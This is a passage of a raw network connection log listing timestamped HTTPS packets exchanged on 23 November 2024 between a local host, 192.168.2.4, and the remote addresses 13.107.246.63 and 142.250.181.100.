                                                                                                                                                                                                Nov 23, 2024 16:54:40.906335115 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906419992 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906424999 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906483889 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906528950 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906701088 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906704903 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906704903 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906714916 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906754017 CET49938443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906765938 CET49937443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906768084 CET4434993813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.906773090 CET4434993713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.908905029 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.908982992 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.908993959 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.909085035 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.909174919 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.909179926 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.909293890 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.909328938 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:40.909329891 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:40.909348965 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:41.017829895 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:41.021388054 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:41.022360086 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:41.022417068 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:41.022423029 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:41.022454023 CET49939443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:41.022458076 CET4434993913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:41.024241924 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:41.024277925 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:41.024344921 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:41.024458885 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:41.024476051 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.436861038 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.444065094 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.444130898 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.446033001 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.446048975 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.622742891 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.623179913 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.623256922 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.623574018 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.623590946 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.757874966 CET49945443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:54:42.757949114 CET44349945142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.758047104 CET49945443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:54:42.758228064 CET49945443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:54:42.758254051 CET44349945142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.804727077 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.805671930 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.805721998 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.809242010 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.809361935 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.809375048 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.809592962 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.809645891 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.809912920 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.809926033 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.847214937 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.847729921 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.847771883 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.848042965 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.848050117 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.879179001 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.882380009 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.882464886 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.882544041 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.882544041 CET49940443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.882586002 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.882612944 CET4434994013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.885251045 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.885283947 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:42.885369062 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.885514975 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:42.885531902 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072433949 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072541952 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072621107 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072683096 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072720051 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072772026 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072820902 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072820902 CET49941443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072858095 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.072884083 CET4434994113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.075378895 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.075414896 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.075475931 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.075599909 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.075612068 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.259807110 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.262429953 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.262890100 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.262943029 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.262967110 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.263040066 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.263040066 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.263040066 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265527964 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265574932 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265605927 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265656948 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265671968 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265671968 CET49943443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265712023 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265737057 CET4434994313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265798092 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265957117 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.265990019 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.267893076 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.267925978 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.267991066 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.268109083 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.268122911 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.334144115 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.334237099 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.334382057 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.334439993 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.334458113 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.334470987 CET49944443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.334477901 CET4434994413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.336494923 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.336586952 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.336674929 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.336828947 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.336848021 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:43.569170952 CET49942443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:43.569221973 CET4434994213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.496146917 CET44349945142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.496483088 CET49945443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:54:44.496546984 CET44349945142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.497030973 CET44349945142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.497293949 CET49945443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:54:44.497385025 CET44349945142.250.181.100192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.538115025 CET49945443192.168.2.4142.250.181.100
                                                                                                                                                                                                Nov 23, 2024 16:54:44.717154026 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.743805885 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:44.743828058 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.744204044 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:44.744210958 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.949501991 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.950215101 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:44.950239897 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:44.952320099 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:44.952322960 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.028561115 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.028974056 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.029016972 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.029376984 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.029388905 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.161906958 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.165719986 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.165849924 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.166115999 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.166115999 CET49946443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.166136026 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.166147947 CET4434994613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.168963909 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.169053078 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.169153929 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.169297934 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.169321060 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.171616077 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.171922922 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.171941996 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.172275066 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.172286034 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.183953047 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.184287071 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.184329987 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.184602022 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.184613943 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.422255039 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.425262928 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.425321102 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.425364971 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.425384045 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.425391912 CET49947443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.425395966 CET4434994713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.428097963 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.428198099 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.428268909 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.428427935 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.428466082 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.466793060 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.469876051 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.469939947 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.469940901 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.469996929 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.470042944 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.470042944 CET49948443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.470078945 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.470103979 CET4434994813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.472126007 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.472155094 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.472214937 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.472347975 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.472361088 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.657593012 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.660677910 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.660793066 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.660912037 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.660923958 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.660934925 CET49949443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.660939932 CET4434994913.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.663387060 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.663474083 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.663563967 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.663686991 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.663710117 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.807080030 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.810352087 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.810450077 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.810528040 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.810528994 CET49950443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.810566902 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.810596943 CET4434995013.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.812475920 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.812503099 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:45.812566996 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.812671900 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:45.812679052 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:46.962654114 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:46.965255976 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:46.965281010 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:46.965682983 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:46.965688944 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.262576103 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.277723074 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.279418945 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.279434919 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.283073902 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.283081055 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.300050974 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.300102949 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.316672087 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.316699028 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.409591913 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.413324118 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.413392067 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.424293995 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.445195913 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.445230961 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.445249081 CET49951443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.445256948 CET4434995113.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.447264910 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.447297096 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.447707891 CET49954443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.447715044 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.464416027 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.464504957 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.464596987 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.468944073 CET49956443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.468993902 CET4434995613.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.602437973 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.602837086 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.602855921 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.603260040 CET49955443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.603264093 CET4434995513.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.709136963 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.712234974 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.712312937 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.712347031 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.712368011 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.712379932 CET49953443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.712385893 CET4434995313.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.714715958 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.714791059 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.714869022 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.714999914 CET49957443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.715030909 CET4434995713.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.720185041 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.720222950 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.720274925 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.720294952 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.720335960 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.720416069 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.720438004 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.720458031 CET49952443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.720464945 CET4434995213.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.722461939 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.722553015 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.722644091 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.722770929 CET49958443192.168.2.413.107.246.63
                                                                                                                                                                                                Nov 23, 2024 16:54:47.722805023 CET4434995813.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.893033028 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.896138906 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.896181107 CET4434995413.107.246.63192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:54:47.896209002 CET49954443192.168.2.413.107.246.63
